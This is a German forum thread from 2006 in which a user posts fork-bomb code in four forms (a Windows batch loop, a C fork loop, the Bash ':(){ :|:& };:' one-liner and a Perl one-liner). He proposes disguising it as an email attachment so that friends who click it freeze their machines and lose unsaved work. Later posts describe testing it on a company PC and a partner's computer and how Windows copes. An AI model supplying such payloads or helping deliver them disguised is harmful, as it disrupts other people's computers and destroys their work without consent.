PDA

Vollständige Version anzeigen : Hat jemand Lust, andere und deren Computer zu ärgern ?



SLOPPY
19.09.2006, 19:38
... für diese Fälle gibt es klitzekleine Programme, die getarnt als E-Post ( e-mails ) verschickt, und wenn der gutgläubige Freund draufklickt, sein System zur Blockade zwingt und die nur durch ziehen des Powersteckers beendet werden können.
Schaden entsteht zwar unmittelbar nicht, aber wenn zig Programme geöffnet sind, man gerade am Briefeschreiben oder Grafiken bearbeiten ist, wird sowas schon zum Ärgernis, weil alles bisher aktuell getätigte futsch ist.

-> für Windows heisst die Batchdatei :
:s
start %0
goto s
-> für "C" :
#include <unistd.h>
int main(void)
{
while(1) {
fork();
}
return 0;
}
-> für Linuxkonsole:

:){ :|:&};:

-> oder einen Perlscript:
perl -e "fork while fork"
------------

... probierts mal am eigenem Rechner aus ... passieren kann nichts ausser einer handfesten 100%igen Prozessorauslastung

SLOPPY
19.09.2006, 19:42
ups ...... das Linux Beispiel offeriert einen Smilie, der automatisch generiert wird wegen Doppelpunkt und Klammer auf -zu am Stück geschrieben ...

bernhard44
19.09.2006, 19:51
Du bist ja wieder ein ganz pöser Heute;)

Sterntaler
19.09.2006, 19:53
...Sloppy, Sloppy, wohin soll das führen?

http://www.cosgan.de/images/smilie/frech/a045.gif

SLOPPY
19.09.2006, 19:55
Du bist ja wieder ein ganz pöser Heute;)

... warum denn, soll ja nur eine "versteckte" Warnung darstellen :] und auch ein wenig Schadenfreude wenn es denn klappt :lach:

Chaos
23.09.2006, 08:30
Ich habs es mit Windows einfach mal ausprobiert und muss sagen, dass es nicht wirklich klappt. Der PC wird zwar sehr langsam, ermöglicht es einem aber immer noch, in den Taskmanager zu gehen und einfahc alle Fenster zusc hließen, die sich geöffnet haben.
Bei mir waren es 197.
Kann natürlich auch vom Prozessor abhängen, ob es klappt.

SLOPPY
23.09.2006, 19:54
Ich habs es mit Windows einfach mal ausprobiert und muss sagen, dass es nicht wirklich klappt. Der PC wird zwar sehr langsam, ermöglicht es einem aber immer noch, in den Taskmanager zu gehen und einfahc alle Fenster zusc hließen, die sich geöffnet haben.
Bei mir waren es 197.
Kann natürlich auch vom Prozessor abhängen, ob es klappt.

Na prima, dass Du sowas mal getestet hast :cool2: ... Selbst habe ich das natürlich auch an einem WindowsPC in der Firma und beim Rechner meiner Holden getestet. Beides sind Pentium-IV mit 1024 MB Ram. Da klappten, wenn man auf die Batchdatei geklickt hat, im hundertstelsekunden Abstand immer neue Dos-Fenster auf. Zwar konnte mit dem Affengriff der Taskmanager gestartet werden, aber da er immer wieder überlagert wurde, waren keine Änderungen möglich. Und bei Linux-PC's geht schon gar nichts mehr. Selbst bei Doppelprozessorenzuckt nicht mal mehr die Maus ...

Chaos
23.09.2006, 23:24
Also, wie gesagt, bei mri gings, hab nen AMD 64 3200+ OC@2300Mhz.
Als ich den Taskmanager aufgerufen hatte, stellten sich die DOS-Fenster schon gelegentlich in den Vordergrund, doch es kamen nur anfangs sehr schnell neue, danahc kamen die so blockweise, immer so ca. 10 Stück und dann erstmal Pause, wo man was anders machen konnte, ca. 1 Sekunde.
Hatte ja nebenbei noch Opera und Trillian auf, sehr praktisch.
Naja, wenn man in XP das alte Menü aktiviert hat, sodass beim Affengriff nicht automatisch der TM kommt, so kann man z.B. auch dort einfach auf abmelden drücken, was einem zumindest das herunterfahren des PCs erspart.

Also ich denke, dass die Rechenlast irgendwie umverteilt wurde, ka, ob das im Prozessor isntalliert ist oder nicht, aber zumindest ist es recht sinnvoll.